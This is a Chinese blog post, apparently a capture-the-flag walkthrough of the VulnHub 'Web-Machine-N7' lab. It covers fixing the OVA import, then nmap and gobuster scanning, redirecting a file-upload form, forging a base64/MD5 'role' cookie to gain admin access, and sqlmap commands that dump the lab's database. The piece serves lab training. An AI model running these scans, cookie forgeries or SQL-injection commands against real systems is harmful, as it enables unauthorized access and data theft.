下载地址:https://www.vulnhub.com/entry/web-machine-n7,756/
选择镜像文件进行下载。下载后解压是一个ova文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。
MD5 :0E793E913D740C42993D47BC964399A6SHA1:67E4452646B3F3B3FC518A900FD0363DFE55F6F4
OVA文件导入失败
在导入文件过程中发现以下错误代码:
Line88: Unsupported element 'StorageItem'.Line98: Unsupported element 'StorageItem'.Line107: Unsupported element 'EthernetPortItem'
解决办法如下:
1、使用压缩工具将 Web-Machine-N7.ova 解压开,会得到mf、ovf、vmdk、ios 四个类型文件
2、将Web Machine(N7).mf 删除,这是文件校验,没用
3、编辑 Web Machine(N7).ovf 将里面的内容全部删除,代替为以下内容
<Envelopeovf:version="1.0"xml:lang="en-US"xmlns="http://schemas.dmtf.org/ovf/envelope/1"xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xmlns:vbox="http://www.virtualbox.org/ovf/machine"><References><Fileovf:id="file1"ovf:href="Web Machine(N7)-disk002.vmdk"/></References><DiskSection><Info>Virtual disk information</Info><Diskovf:capacity="30"ovf:capacityAllocationUnits="byte * 2^30"ovf:diskId="vmdisk1"ovf:fileRef="file1"ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized"/></DiskSection><NetworkSection><Info>Logical networks used in the package</Info><Networkovf:name="NAT"><Description>Logical network used by this appliance.</Description></Network></NetworkSection><VirtualSystemovf:id="vm"><Info>A virtual machine</Info><EulaSection><Info>License agreement for the virtual system</Info><License>Go https://2ba.cc</License></EulaSection><OperatingSystemSectionovf:id="96"><Info>The kind of installed guest operating system</Info><Description>Debian_64</Description><vbox:OSTypeovf:required="false">Debian_64</vbox:OSType></OperatingSystemSection><VirtualHardwareSection><Info>Virtual hardware requirements</Info><System><vssd:ElementName>Virtual Hardware Family</vssd:ElementName><vssd:InstanceID>0</vssd:InstanceID><vssd:VirtualSystemIdentifier>vm</vssd:VirtualSystemIdentifier><vssd:VirtualSystemType>vm</vssd:VirtualSystemType></System><Item><rasd:Caption>1 virtual CPU</rasd:Caption><rasd:Description>Number of virtual CPUs</rasd:Description><rasd:ElementName>1 virtual CPU</rasd:ElementName><rasd:InstanceID>1</rasd:InstanceID><rasd:ResourceType>3</rasd:ResourceType><rasd:VirtualQuantity>1</rasd:VirtualQuantity></Item><Item><rasd:AllocationUnits>MegaBytes</rasd:AllocationUnits><rasd:Caption>1024 MB of memory</rasd:Caption><rasd:Description>Memory Size</rasd:Description><rasd:ElementName>1024 MB of memory</rasd:ElementName><rasd:InstanceID>2</rasd:InstanceID><rasd:ResourceType>4</rasd:ResourceType><rasd:VirtualQuantity>1024</rasd:VirtualQuantity></Item><Item><rasd:Address>0</rasd:Address><rasd:Caption>ideController0</rasd:Caption><rasd:Description>IDE Controller</rasd:Description><rasd:ElementName>ideController0</rasd:ElementName><rasd:InstanceID>3</rasd:InstanceID><rasd:ResourceSubType>PIIX4</rasd:ResourceSubType><rasd:ResourceType>5</rasd:ResourceType></Item><Item><rasd:Address>1</rasd:Address><rasd:Caption>ideController1</rasd:Caption><rasd:Description>IDE Controller</rasd:Description><rasd:ElementName>ideController1</rasd:ElementName><rasd:InstanceID>4</rasd:InstanceID><rasd:ResourceSubType>PIIX4</rasd:ResourceSubType><rasd:ResourceType>5</rasd:ResourceType></Item><Item><rasd:Address>0</rasd:Address><rasd:Caption>sataController0</rasd:Caption><rasd:Description>SATA Controller</rasd:Description><rasd:ElementName>sataController0</rasd:ElementName><rasd:InstanceID>5</rasd:InstanceID><rasd:ResourceSubType>AHCI</rasd:ResourceSubType><rasd:ResourceType>20</rasd:ResourceType></Item><Item><rasd:AddressOnParent>0</rasd:AddressOnParent><rasd:Caption>disk1</rasd:Caption><rasd:Description>Disk Image</rasd:Description><rasd:ElementName>disk1</rasd:ElementName><rasd:HostResource>/disk/vmdisk1</rasd:HostResource><rasd:InstanceID>7</rasd:InstanceID><rasd:Parent>5</rasd:Parent><rasd:ResourceType>17</rasd:ResourceType></Item><Item><rasd:AutomaticAllocation>true</rasd:AutomaticAllocation><rasd:Caption>Ethernet adapter on 'NAT'</rasd:Caption><rasd:Connection>NAT</rasd:Connection><rasd:ElementName>Ethernet adapter on 'NAT'</rasd:ElementName><rasd:InstanceID>8</rasd:InstanceID><rasd:ResourceSubType>E1000</rasd:ResourceSubType><rasd:ResourceType>10</rasd:ResourceType></Item></VirtualHardwareSection></VirtualSystem></Envelope>
获取flag值
注意:需要一个强大的字典进行目录扫描!
确定IP地址、开放端口、目录扫描、网站访问。
nmap扫描,发现IP地址为:192.168.241.134
nmap -sP 192.168.241.0/24
通过nmap进行扫描,发现仅开放80端口。
nmap -sV -v -T4 -A192.168.241.129
访问80端口,发现网页内容信息。
使用dirsearch扫描,并未发现任何实质性有用信息。
使用gobuster,进行扫描。
gobuster dir -u http://192.168.241.134 -x php,txt,jsp,asp,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
发现exploit.html可上传文件。
上帝视角:还有一个enter_network地址可访问,但更换多个庞大字典库进行地毯式搜索,仍未扫描出。
既然已经知道enter_network地址,我们对该地址进行再次目录扫描,发现index.php和admin.php页面。
文件上传、修改cookie值、SQL注入。
在exploit.html上传一个随机文件后,返回信息为:
http://localhost/profile.php
查看源代码,发现代码中action指向localhost地址。
将localhsot改为靶机IP:192.168.241.134
重新上传,进行访问,发现其跳转到profile.php页面,flag值只显示了前两位。
在enter_network/index.php页面输入登录信息,抓包发现响应信息中有cookie值。
对cookie值进行base64解码。
再次进行md5编码,发现最后结果为admin。
在admin.php页面抓包,将cookie值改为role:admin,即可获取flag后半部分值。
合在一起,flag值为:FLAG{N7KSA_01}。
在enter_network/index.php页面,使用SQLmap进行SQL注入测试。
python sqlmap.py -r 1.txt--dbs--batchPOST/enter_network/index.php HTTP/1.1Host: 192.168.241.134User-Agent: Mozilla/5.0 (WindowsNT10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 35Origin: http://192.168.241.134Connection: closeReferer: http://192.168.241.134/enter_network/index.phpCookie: user=JGFyZ29uMmkkdj0xOSRtPTY1NTM2LHQ9NCxwPTEkYmpOM1dXbEVPVUp5Y1hKaVptaGFadyRFZVJGMmpXY1M0bUtham5NZHdPSElvd3B5VEtyOHMyUVdqOW8zN25EcENB; role=MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%253DUpgrade-Insecure-Requests: 1Priority: u=0, iuser=admin&pass=1&sub=SEND
可以看到有个Machine库。
查看该数据库的表名。
python sqlmap.py -r 1.txt -D Machine --tables--batch
查看login表列名。
python sqlmap.py -r 1.txt -D Machine -T login --columns--batch
查看数据。
免责声明
本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!
以下为本公众号声明内容,请知悉并遵守:
1.关于信息的准确性
本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。
2.法律与合规性
使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。
3.版权声明
本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。
4.合法用途限制
本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。
5.风险告知
因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Web-Machine-N7靶场渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论